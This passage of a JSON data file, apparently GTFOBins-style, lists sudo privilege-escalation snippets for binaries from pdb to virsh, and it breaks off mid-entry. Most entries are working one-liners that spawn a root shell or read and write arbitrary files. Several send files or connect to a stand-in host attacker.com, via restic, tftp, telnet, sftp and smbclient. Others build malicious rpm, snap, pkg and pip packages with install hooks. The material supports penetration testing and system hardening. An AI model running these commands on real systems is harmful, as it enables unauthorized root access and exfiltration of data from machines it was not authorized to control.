$LFILE\n" } ], "pdb": [ { "code": "TF=$(mktemp)\necho 'import os; os.system(\"/bin/sh\")' > $TF\nsudo pdb $TF\ncont\n" } ], "pdflatex": [ { "code": "sudo pdflatex '\\documentclass{article}\\usepackage{verbatim}\\begin{document}\\verbatiminput{file_to_read}\\end{document}'\npdftotext article.pdf -\n", "description": "The read file will be part of the output." }, { "code": "sudo pdflatex --shell-escape '\\documentclass{article}\\begin{document}\\immediate\\write18{/bin/sh}\\end{document}'\n" } ], "pdftex": [ { "code": "sudo pdftex --shell-escape '\\write18{/bin/sh}\\end'\n" } ], "perf": [ { "code": "sudo perf stat /bin/sh\n" } ], "perl": [ { "code": "sudo perl -e 'exec \"/bin/sh\";'" } ], "perlbug": [ { "code": "sudo perlbug -s 'x x x' -r x -c x -e 'exec /bin/sh;'" } ], "pexec": [ { "code": "sudo pexec /bin/sh" } ], "pg": [ { "code": "sudo pg /etc/profile\n!/bin/sh\n" } ], "php": [ { "code": "CMD=\"/bin/sh\"\nsudo php -r \"system('$CMD');\"\n" } ], "pic": [ { "code": "sudo pic -U\n.PS\nsh X sh X\n" } ], "pico": [ { "code": "sudo pico\n^R^X\nreset; sh 1>&0 2>&0\n" } ], "pidstat": [ { "code": "COMMAND=id\nsudo pidstat -e $COMMAND\n" } ], "pip": [ { "code": "TF=$(mktemp -d)\necho \"import os; os.execl('/bin/sh', 'sh', '-c', 'sh <$(tty) >$(tty) 2>$(tty)')\" > $TF/setup.py\nsudo pip install $TF\n" } ], "pkexec": [ { "code": "sudo pkexec /bin/sh" } ], "pkg": [ { "code": "sudo pkg install -y --no-repo-update ./x-1.0.txz\n", "description": "It runs commands using a specially crafted FreeBSD package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n```\nTF=$(mktemp -d)\necho 'id' > $TF/x.sh\nfpm -n x -s dir -t freebsd -a all --before-install $TF/x.sh $TF\n```\n" } ], "posh": [ { "code": "sudo posh" } ], "pr": [ { "code": "LFILE=file_to_read\npr -T $LFILE\n" } ], "pry": [ { "code": "sudo pry\nsystem(\"/bin/sh\")\n" } ], "psftp": [ { "code": "sudo psftp\n!/bin/sh\n" } ], "psql": [ { "code": "psql\n\\?\n!/bin/sh\n" } ], "ptx": [ { "code": "LFILE=file_to_read\nsudo ptx -w 5000 \"$LFILE\"\n" } ], "puppet": [ { "code": "sudo puppet apply -e \"exec { '/bin/sh -c \\\"exec sh -i <$(tty) >$(tty) 2>$(tty)\\\"': }\"\n" } ], "pwsh": [ { "code": "sudo pwsh" } ], "python": [ { "code": "sudo python -c 'import os; os.system(\"/bin/sh\")'" } ], "rake": [ { "code": "sudo rake -p '`/bin/sh 1>&0`'" } ], "rc": [ { "code": "sudo rc -c '/bin/sh'" } ], "readelf": [ { "code": "LFILE=file_to_read\nsudo readelf -a @$LFILE\n" } ], "red": [ { "code": "sudo red file_to_write\na\nDATA\n.\nw\nq\n" } ], "redcarpet": [ { "code": "LFILE=file_to_read\nsudo redcarpet \"$LFILE\"\n" } ], "restic": [ { "code": "RHOST=attacker.com\nRPORT=12345\nLFILE=file_or_dir_to_get\nNAME=backup_name\nsudo restic backup -r \"rest:http://$RHOST:$RPORT/$NAME\" \"$LFILE\"\n" } ], "rev": [ { "code": "LFILE=file_to_read\nsudo rev $LFILE | rev\n" } ], "rlwrap": [ { "code": "sudo rlwrap /bin/sh" } ], "rpm": [ { "code": "sudo rpm --eval '%{lua:os.execute(\"/bin/sh\")}'" }, { "code": "sudo rpm -ivh x-1.0-1.noarch.rpm\n", "description": "It runs commands using a specially crafted RPM package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n```\nTF=$(mktemp -d)\necho 'id' > $TF/x.sh\nfpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF\n```\n" } ], "rpmdb": [ { "code": "sudo rpmdb --eval '%(/bin/sh 1>&2)'" } ], "rpmquery": [ { "code": "sudo rpmquery --eval '%{lua:posix.exec(\"/bin/sh\")}'" } ], "rpmverify": [ { "code": "sudo rpmverify --eval '%(/bin/sh 1>&2)'" } ], "rsync": [ { "code": "sudo rsync -e 'sh -c \"sh 0<&2 1>&2\"' 127.0.0.1:/dev/null" } ], "ruby": [ { "code": "sudo ruby -e 'exec \"/bin/sh\"'" } ], "run-mailcap": [ { "code": "sudo run-mailcap --action=view /etc/hosts\n!/bin/sh\n", "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." } ], "run-parts": [ { "code": "sudo run-parts --new-session --regex '^sh$' /bin" } ], "runscript": [ { "code": "TF=$(mktemp)\necho '! exec /bin/sh' >$TF\nsudo runscript $TF\n" } ], "rview": [ { "code": "sudo rview -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'", "description": "This requires that `rview` is compiled with Python support. Prepend `:py3` for Python 3." }, { "code": "sudo rview -c ':lua os.execute(\"reset; exec sh\")'", "description": "This requires that `rview` is compiled with Lua support." } ], "rvim": [ { "code": "sudo rvim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'", "description": "This requires that `rvim` is compiled with Python support. Prepend `:py3` for Python 3." }, { "code": "sudo rvim -c ':lua os.execute(\"reset; exec sh\")'", "description": "This requires that `rvim` is compiled with Lua support." } ], "sash": [ { "code": "sudo sash" } ], "scanmem": [ { "code": "sudo scanmem\nshell /bin/sh\n" } ], "scp": [ { "code": "TF=$(mktemp)\necho 'sh 0<&2 1>&2' > $TF\nchmod +x \"$TF\"\nsudo scp -S $TF x y:\n" } ], "screen": [ { "code": "sudo screen" } ], "script": [ { "code": "sudo script -q /dev/null" } ], "scrot": [ { "code": "sudo scrot -e /bin/sh" } ], "sed": [ { "code": "sudo sed -n '1e exec sh 1>&0' /etc/hosts", "description": "GNU version only. Also, this requires `bash`." } ], "service": [ { "code": "sudo service ../../bin/sh" } ], "setarch": [ { "code": "sudo setarch $(arch) /bin/sh" } ], "setfacl": [ { "code": "LFILE=file_to_change\nUSER=somebody\nsudo setfacl -m -u:$USER:rwx $LFILE\n" } ], "setlock": [ { "code": "sudo setlock - /bin/sh" } ], "sftp": [ { "code": "HOST=user@attacker.com\nsudo sftp $HOST\n!/bin/sh\n" } ], "sg": [ { "code": "sudo sg root\n" } ], "shuf": [ { "code": "LFILE=file_to_write\nsudo shuf -e DATA -o \"$LFILE\"\n", "description": "The written file content is corrupted by adding a newline." } ], "slsh": [ { "code": "sudo slsh -e 'system(\"/bin/sh\")'" } ], "smbclient": [ { "code": "sudo smbclient '\\\\attacker\\share'\n!/bin/sh\n" } ], "snap": [ { "code": "sudo snap install xxxx_1.0_all.snap --dangerous --devmode\n", "description": "It runs commands using a specially crafted Snap package. Generate it with [fpm](https://github.com/jordansissel/fpm) and upload it to the target.\n```\nCOMMAND=id\ncd $(mktemp -d)\nmkdir -p meta/hooks\nprintf '#!/bin/sh\\n%s; false' \"$COMMAND\" >meta/hooks/install\nchmod +x meta/hooks/install\nfpm -n xxxx -s dir -t snap -a all meta\n```\n" } ], "socat": [ { "code": "sudo socat stdin exec:/bin/sh\n", "description": "The resulting shell is not a proper TTY shell and lacks the prompt." } ], "soelim": [ { "code": "LFILE=file_to_read\nsudo soelim \"$LFILE\"\n" } ], "softlimit": [ { "code": "sudo softlimit /bin/sh" } ], "sort": [ { "code": "LFILE=file_to_read\nsudo sort -m \"$LFILE\"\n" } ], "split": [ { "code": "sudo split --filter=/bin/sh /dev/stdin\n", "description": "The shell prompt is not printed." } ], "sqlite3": [ { "code": "sudo sqlite3 /dev/null '.shell /bin/sh'" } ], "sqlmap": [ { "code": "sudo sqlmap -u 127.0.0.1 --eval=\"import os; os.system('/bin/sh')\"" } ], "ss": [ { "code": "LFILE=file_to_read\nsudo ss -a -F $LFILE\n" } ], "ssh": [ { "code": "sudo ssh -o ProxyCommand=';sh 0<&2 1>&2' x", "description": "Spawn interactive root shell through ProxyCommand option." } ], "ssh-agent": [ { "code": "sudo ssh-agent /bin/" } ], "ssh-keygen": [ { "code": "sudo ssh-keygen -D ./lib.so", "description": "" } ], "ssh-keyscan": [ { "code": "LFILE=file_to_read\nsudo ssh-keyscan -f $LFILE\n" } ], "sshpass": [ { "code": "sudo sshpass /bin/sh" } ], "start-stop-daemon": [ { "code": "sudo start-stop-daemon -n $RANDOM -S -x /bin/sh" } ], "stdbuf": [ { "code": "sudo stdbuf -i0 /bin/sh" } ], "strace": [ { "code": "sudo strace -o /dev/null /bin/sh" } ], "strings": [ { "code": "LFILE=file_to_read\nsudo strings \"$LFILE\"\n" } ], "su": [ { "code": "sudo su" } ], "sudo": [ { "code": "sudo sudo /bin/sh" } ], "sysctl": [ { "code": "COMMAND='/bin/sh -c id>/tmp/id'\nsudo sysctl \"kernel.core_pattern=|$COMMAND\"\nsleep 9999 &\nkill -QUIT $!\ncat /tmp/id\n" } ], "systemctl": [ { "code": "TF=$(mktemp)\necho /bin/sh >$TF\nchmod +x $TF\nsudo SYSTEMD_EDITOR=$TF systemctl edit system.slice\n" }, { "code": "TF=$(mktemp).service\necho '[Service]\nType=oneshot\nExecStart=/bin/sh -c \"id > /tmp/output\"\n[Install]\nWantedBy=multi-user.target' > $TF\nsudo systemctl link $TF\nsudo systemctl enable --now $TF\n" }, { "code": "sudo systemctl\n!sh\n", "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." } ], "systemd-resolve": [ { "code": "sudo systemd-resolve --status\n!sh\n", "description": "This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply." } ], "tac": [ { "code": "LFILE=file_to_read\nsudo tac -s 'RANDOM' \"$LFILE\"\n" } ], "tail": [ { "code": "LFILE=file_to_read\nsudo tail -c1G \"$LFILE\"\n" } ], "tar": [ { "code": "sudo tar -cf /dev/null /dev/null --checkpoint=1 --checkpoint-action=exec=/bin/sh" } ], "task": [ { "code": "sudo task execute /bin/sh" } ], "taskset": [ { "code": "sudo taskset 1 /bin/sh" } ], "tasksh": [ { "code": "sudo tasksh\n!/bin/sh\n" } ], "tbl": [ { "code": "LFILE=file_to_read\nsudo tbl $LFILE\n" } ], "tclsh": [ { "code": "sudo tclsh\nexec /bin/sh <@stdin >@stdout 2>@stderr\n" } ], "tcpdump": [ { "code": "COMMAND='id'\nTF=$(mktemp)\necho \"$COMMAND\" > $TF\nchmod +x $TF\nsudo tcpdump -ln -i lo -w /dev/null -W 1 -G 1 -z $TF -Z root\n" } ], "tdbtool": [ { "code": "sudo tdbtool\n! /bin/sh\n" } ], "tee": [ { "code": "LFILE=file_to_write\necho DATA | sudo tee -a \"$LFILE\"\n" } ], "telnet": [ { "code": "RHOST=attacker.com\nRPORT=12345\nsudo telnet $RHOST $RPORT\n^]\n!/bin/sh\n", "description": "BSD version only. Needs to be connected first." } ], "terraform": [ { "code": "sudo terraform console\nfile(\"file_to_read\")\n" } ], "tex": [ { "code": "sudo tex --shell-escape '\\write18{/bin/sh}\\end'\n" } ], "tftp": [ { "code": "RHOST=attacker.com\nsudo tftp $RHOST\nput file_to_send\n", "description": "Send local file to a TFTP server." } ], "tic": [ { "code": "LFILE=file_to_read\nsudo tic -C \"$LFILE\"\n" } ], "time": [ { "code": "sudo /usr/bin/time /bin/sh" } ], "timedatectl": [ { "code": "sudo timedatectl list-timezones\n!/bin/sh\n" } ], "timeout": [ { "code": "sudo timeout --foreground 7d /bin/sh" } ], "tmate": [ { "code": "sudo tmate -c /bin/sh" } ], "tmux": [ { "code": "sudo tmux" } ], "top": [ { "code": "echo -e 'pipe\\tx\\texec /bin/sh 1>&0 2>&0' >>/root/.config/procps/toprc\nsudo top\n# press return twice\nreset\n", "description": "This requires that the root configuration file is writable and might be used to persist elevated privileges." } ], "torify": [ { "code": "sudo torify /bin/sh" } ], "torsocks": [ { "code": "sudo torsocks /bin/sh" } ], "troff": [ { "code": "LFILE=file_to_read\nsudo troff $LFILE\n" } ], "ul": [ { "code": "LFILE=file_to_read\nsudo ul \"$LFILE\"\n" } ], "unexpand": [ { "code": "LFILE=file_to_read\nsudo unexpand -t99999999 \"$LFILE\"\n" } ], "uniq": [ { "code": "LFILE=file_to_read\nsudo uniq \"$LFILE\"\n" } ], "unshare": [ { "code": "sudo unshare /bin/sh" } ], "unsquashfs": [ { "code": "sudo unsquashfs shell\n./squashfs-root/sh -p\n" } ], "unzip": [ { "code": "sudo unzip -K shell.zip\n./sh -p\n" } ], "update-alternatives": [ { "code": "LFILE=/path/to/file_to_write\nTF=$(mktemp)\necho DATA >$TF\nsudo update-alternatives --force --install \"$LFILE\" x \"$TF\" 0\n", "description": "Write in `$LFILE` a symlink to `$TF`." } ], "uudecode": [ { "code": "LFILE=file_to_read\nsudo uuencode \"$LFILE\" /dev/stdout | uudecode\n" } ], "uuencode": [ { "code": "LFILE=file_to_read\nsudo uuencode \"$LFILE\" /dev/stdout | uudecode\n" } ], "vagrant": [ { "code": "cd $(mktemp -d)\necho 'exec \"/bin/sh\"' > Vagrantfile\nvagrant up\n" } ], "valgrind": [ { "code": "sudo valgrind /bin/sh" } ], "varnishncsa": [ { "code": "LFILE=file_to_write\nsudo varnishncsa -g request -q 'ReqURL ~ \"/xxx\"' -F '%{yyy}i' -w \"$LFILE\"\n" } ], "vi": [ { "code": "sudo vi -c ':!/bin/sh' /dev/null" } ], "view": [ { "code": "sudo view -c ':!/bin/sh'" }, { "code": "sudo view -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'", "description": "This requires that `view` is compiled with Python support. Prepend `:py3` for Python 3." }, { "code": "sudo view -c ':lua os.execute(\"reset; exec sh\")'", "description": "This requires that `view` is compiled with Lua support." } ], "vigr": [ { "code": "sudo vigr" } ], "vim": [ { "code": "sudo vim -c ':!/bin/sh'" }, { "code": "sudo vim -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'", "description": "This requires that `vim` is compiled with Python support. Prepend `:py3` for Python 3." }, { "code": "sudo vim -c ':lua os.execute(\"reset; exec sh\")'", "description": "This requires that `vim` is compiled with Lua support." } ], "vimdiff": [ { "code": "sudo vimdiff -c ':!/bin/sh'" }, { "code": "sudo vimdiff -c ':py import os; os.execl(\"/bin/sh\", \"sh\", \"-c\", \"reset; exec sh\")'", "description": "This requires that `vimdiff` is compiled with Python support. Prepend `:py3` for Python 3." }, { "code": "sudo vimdiff -c ':lua os.execute(\"reset; exec sh\")'", "description": "This requires that `vimdiff` is compiled with Lua support." } ], "vipw": [ { "code": "sudo vipw" } ], "virsh": [ { "code": "SCRIPT=script_to_run\nTF=$(mktemp)\ncat > $TF << EOF\n\n x\n \n hvm\n \n 1\n \n \n